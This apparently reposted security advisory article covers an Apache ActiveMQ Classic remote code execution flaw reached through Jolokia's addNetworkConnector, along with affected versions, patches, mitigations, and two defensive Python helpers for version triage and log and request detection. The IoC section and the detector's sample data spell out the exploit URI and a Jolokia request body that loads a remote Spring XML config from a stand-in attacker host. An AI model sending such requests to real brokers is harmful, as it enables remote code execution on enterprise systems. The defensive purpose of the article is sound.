A critical remote code execution (RCE) vulnerability tracked as CVE-2026-34197 has been disclosed in Apache ActiveMQ Classic, exposing enterprise message brokers to arbitrary command execution through a design flaw that has lurked undetected in the codebase for over 13 years.
Added to the catalog on April 16, 2026, with a remediation deadline of April 30, 2026, this vulnerability demands immediate attention from security teams across all sectors that rely on ActiveMQ for distributed messaging infrastructure.
Apache ActiveMQ is one of the most widely deployed open-source Java message brokers worldwide, underpinning asynchronous communication across financial services, healthcare, e-commerce, and government environments.
Apache ActiveMQ Flaw
It acts as middleware that decouples services and manages message queues in distributed architectures, making it critical infrastructure in thousands of enterprises globally.
The vulnerability affects only ActiveMQ Classic, the original broker implementation, and does not affect ActiveMQ Artemis. The broker ships by default with a web-based management console on port 8161, powered by the Jetty web server.
This console embeds Jolokia, an HTTP-to-JMX bridge that exposes broker management operations as a REST API at /api/jolokia/. That Jolokia endpoint sits at the heart of this newly disclosed vulnerability.
Assigned a CVSS v3.1 base score of 8.8 (High), CVE-2026-34197 is rooted in two interacting CWEs: CWE-20 (Improper Input Validation) and CWE-94 (Improper Control of Generation of Code / Code Injection).
The vulnerability chain works as follows: ActiveMQ’s default Jolokia access policy permits exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector(String).
An authenticated attacker can send a crafted POST request to the Jolokia endpoint, invoking this operation with a malicious discovery URI.
The URI manipulates the VM transport’s brokerConfig parameter to point at a remote, attacker-controlled Spring XML application context hosted over HTTP.
When ActiveMQ’s VM transport encounters a broker name that doesn’t exist, it automatically calls BrokerFactory.createBroker() using the attacker-supplied URL.
Spring ResourceXmlApplicationContext instantiates all singleton bean definitions before the BrokerService validates the configuration, meaning arbitrary code runs on the broker’s JVM via bean factory methods, such as Runtime.exec(), enabling full OS-level command execution.
This exploit path has existed since the Jolokia fix for CVE-2022-41678 inadvertently introduced a blanket <operation>*</operation> allow rule covering all ActiveMQ MBeans. The rule was meant to preserve web console functionality, but it opened an entirely new exploitation surface.
Unauthenticated RCE on Certain Versions
While CVE-2026-34197 nominally requires low-privilege credentials, the exploitation barrier drops to zero on ActiveMQ versions 6.0.0 through 6.1.1.
A separate flaw, CVE-2024-32114, inadvertently removed the /api/* path (which includes Jolokia) from the web console’s security constraints on those versions, making the entire Jolokia API unauthenticated.
The combination of these two CVEs results in a fully unauthenticated RCE chain, no credentials needed. Even on protected versions, the default credential pair admin:admin remains common across many ActiveMQ deployments, drastically reducing the practical exploitation barrier in real-world environments.
Affected Versions and Patch
Apache has confirmed patches are available in the following versions:
- Apache ActiveMQ Classic 5.19.4 (fixes the issue in the 5.x branch)
- Apache ActiveMQ Classic 6.2.3 (fixes the issue in the 6.x branch, and also resolves CVE-2024-32114)
Organizations running 6.0.0 through 6.1.1 must treat this as an emergency-priority upgrade, as they are vulnerable to unauthenticated RCE without any user interaction beyond network access to port 8161.
The patch removes the ability for the addNetworkConnector operation to register vm:// transports, a code path that was never intended to be exposed as a remote operation.
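The following triage helper is an added example, not code from the article or from the Apache ActiveMQ project. It encodes only the version facts stated above (fixes in 5.19.4 and 6.2.3; unauthenticated exposure on 6.0.0 through 6.1.1 via CVE-2024-32114) so that an asset inventory can be sorted into upgrade order. The host names and versions in the sample inventory are constructed, and any major version other than 5 or 6 is reported as an unknown branch rather than guessed at.

```python
import re

# First fixed release per branch, as stated in the advisory text above.
FIXED_BY_BRANCH = {5: (5, 19, 4), 6: (6, 2, 3)}

# Versions on which CVE-2024-32114 removes authentication from /api/* (inclusive range).
UNAUTH_RANGE = ((6, 0, 0), (6, 1, 1))

# Lower number = upgrade sooner.
PRIORITY = {"unauthenticated-rce": 0, "authenticated-rce": 1, "unknown-branch": 2, "patched": 3}


def parse_version(version: str) -> tuple[int, int, int]:
    """Parse a strict X.Y.Z ActiveMQ Classic version (an optional leading 'v' is tolerated)."""
    match = re.fullmatch(r"\s*v?(\d+)\.(\d+)\.(\d+)\s*", version)
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.groups())  # type: ignore[return-value]


def triage(version: str) -> str:
    """Classify one broker version against CVE-2026-34197.

    Returns 'patched', 'unauthenticated-rce' (6.0.0-6.1.1, chained with
    CVE-2024-32114), 'authenticated-rce' (any other unpatched 5.x/6.x), or
    'unknown-branch' for major versions the advisory does not cover.
    """
    v = parse_version(version)
    fixed = FIXED_BY_BRANCH.get(v[0])
    if fixed is None:
        return "unknown-branch"
    if v >= fixed:
        return "patched"
    if UNAUTH_RANGE[0] <= v <= UNAUTH_RANGE[1]:
        return "unauthenticated-rce"
    return "authenticated-rce"


def prioritize(inventory):
    """Return (host, version, status) rows ordered so the most urgent upgrades come first."""
    rows = [(host, version, triage(version)) for host, version in inventory]
    return sorted(rows, key=lambda row: (PRIORITY[row[2]], row[0]))


# Constructed sample inventory (hypothetical hosts, not real systems).
SAMPLE_INVENTORY = [
    ("mq-dev", "6.2.3"),
    ("mq-prod-2", "5.18.3"),
    ("mq-prod-1", "6.1.0"),
    ("mq-legacy", "5.19.3"),
]

if __name__ == "__main__":
    for host, version, status in prioritize(SAMPLE_INVENTORY):
        print(f"{host:12} {version:8} {status}")
```

Because the advisory names 5.19.4 as the 5.x fix, every older 5.x release (including other 5.x minor lines) is reported as needing an upgrade; the helper does not try to infer backports the article does not mention.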
Mitigation Actions
CISA added CVE-2026-34197 to its KEV catalog on April 16, 2026, with a mandatory remediation due date of April 30, 2026, for federal agencies under BOD 22-01.
Apache ActiveMQ has appeared in the KEV catalog before, with CVE-2016-3088 and CVE-2023-46604 also listed, confirming that threat actors and ransomware operators consistently target it as a high-value system.
Organizations that cannot immediately patch should implement the following interim mitigations:
- Restrict access to port 8161 to trusted management networks only and block public internet exposure
- Disable or tightly lock down Jolokia exec operations at /api/jolokia/
- Immediately rotate default credentials (admin:admin) and enforce strong, unique authentication
- Monitor broker logs for vm:// URIs containing brokerConfig=xbean:http, an unambiguous indicator of active exploitation
- Detect POST requests to /api/jolokia/ with addNetworkConnector in the request body, and watch for unexpected child processes spawned by the ActiveMQ Java process
Indicators of Compromise (IoCs)
Security teams should specifically search broker logs for entries such as:
INFO | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://[ATTACKER-IP]/payload.xml
This log pattern is a definitive indicator of an exploitation attempt. Critically, command execution occurs during the connection attempt, meaning the payload has already run even if the log subsequently shows a configuration failure warning.
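The detection logic below is an added example written for this article; it is not code from the article's author or from the ActiveMQ or Jolokia projects. It implements the two detection bullets from the mitigation list and the log indicator above: it extracts every vm:// URI from a broker log line and flags any whose brokerConfig parameter loads a remote xbean:http or xbean:https resource, and it grades a Jolokia POST body by whether it is an exec request naming addNetworkConnector and whether its arguments carry the same remote brokerConfig. The sample log lines, the 203.0.113.10 address (documentation range) and the request body are constructed; the "<broker-mbean>" value is a placeholder, not a real ObjectName. The script goes slightly beyond the article's literal indicator by also matching xbean:https and by accepting Jolokia's bulk (JSON array) request form.

```python
import json
import re
from urllib.parse import parse_qs

# A vm:// transport URI as it appears in a log line or request argument.
VM_URI_RE = re.compile(r"vm://[^\s\"'<>]+")
# brokerConfig values that pull a Spring XML context from a remote HTTP(S) server.
REMOTE_XBEAN_RE = re.compile(r"^xbean:https?://", re.IGNORECASE)


def remote_broker_configs(text: str) -> list[str]:
    """Return every brokerConfig value in `text` that points at a remote xbean resource."""
    hits = []
    for uri in VM_URI_RE.findall(text):
        _, _, query = uri.partition("?")          # vm://name?create=true&brokerConfig=...
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get("brokerConfig", []):
            if REMOTE_XBEAN_RE.match(value):
                hits.append(value)
    return hits


def scan_broker_log(lines):
    """Yield (line_number, brokerConfig) for each log line carrying the indicator."""
    for number, line in enumerate(lines, start=1):
        for config in remote_broker_configs(line):
            yield number, config


def classify_jolokia_request(body: str) -> str:
    """Grade a Jolokia POST body: 'exploit', 'review' or 'benign'.

    'exploit'  - an exec request for addNetworkConnector whose arguments load a remote xbean context
    'review'   - addNetworkConnector is invoked (legitimate admins may do this with tcp:// URIs)
    'benign'   - anything else
    A body that is not valid JSON is graded on a plain substring check so it cannot slip through.
    """
    try:
        parsed = json.loads(body)
    except ValueError:
        return "review" if "addNetworkConnector" in body else "benign"
    requests = parsed if isinstance(parsed, list) else [parsed]
    level = "benign"
    for req in requests:
        if not isinstance(req, dict):
            continue
        is_exec = str(req.get("type", "")).lower() == "exec"
        if is_exec and "addNetworkConnector" in str(req.get("operation", "")):
            args = req.get("arguments") or []
            if not isinstance(args, list):
                args = [args]
            if remote_broker_configs(" ".join(str(a) for a in args)):
                return "exploit"
            level = "review"
    return level


# Constructed sample log lines (formats approximate a broker log; line 3 mirrors the IoC above).
SAMPLE_LOG = [
    "INFO | Apache ActiveMQ 6.1.0 (localhost, ID:mq-prod-1-1234) is starting",
    "INFO | Establishing network connection from vm://localhost to tcp://10.0.0.7:61616",
    "INFO | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://203.0.113.10/payload.xml",
    "WARN | Could not start network bridge between: vm://localhost and: vm://rce?create=true&brokerConfig=xbean:http://203.0.113.10/payload.xml",
]

# Constructed request body; "<broker-mbean>" is a placeholder, not a real ObjectName.
SAMPLE_EXPLOIT_BODY = json.dumps({
    "type": "exec",
    "mbean": "<broker-mbean>",
    "operation": "addNetworkConnector(java.lang.String)",
    "arguments": ["vm://rce?create=true&brokerConfig=xbean:http://203.0.113.10/payload.xml"],
})

if __name__ == "__main__":
    for number, config in scan_broker_log(SAMPLE_LOG):
        print(f"line {number}: remote brokerConfig {config}")
    print("request grade:", classify_jolokia_request(SAMPLE_EXPLOIT_BODY))
```

Run it against a real activemq.log with `scan_broker_log(open(path))`; the request grader is meant to sit behind whatever reverse proxy or WAF already sees traffic to /api/jolokia/. A 'review' grade on its own is not proof of compromise, since addNetworkConnector is a legitimate administrative operation, but an 'exploit' grade or any log hit should be treated as confirmed exploitation because, as noted above, the payload has already run by the time the bridge fails.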
Frequently Asked Questions (FAQs)
Q1: Does CVE-2026-34197 affect Apache ActiveMQ Artemis?
No, CVE-2026-34197 exclusively affects Apache ActiveMQ Classic and does not impact the ActiveMQ Artemis implementation.
Q2: What CVSS score is assigned to CVE-2026-34197, and does it require authentication?
CVE-2026-34197 has a CVSS v3.1 score of 8.8 (High). It requires low-privilege credentials in most versions, but is fully unauthenticated on ActiveMQ 6.0.0–6.1.1 when chained with CVE-2024-32114.
Q3: How quickly should organizations patch CVE-2026-34197?
CISA mandates remediation by April 30, 2026, for federal agencies under BOD 22-01, and all organizations should treat this as critical, given the public PoC availability and ActiveMQ’s history of ransomware targeting.
Q4: What is the simplest interim mitigation if immediate patching is not possible?
Block external access to ActiveMQ’s web console port 8161, turn off Jolokia exec operations, and replace all default admin:admin credentials with strong authentication immediately.
Site: http://thecybrdef.com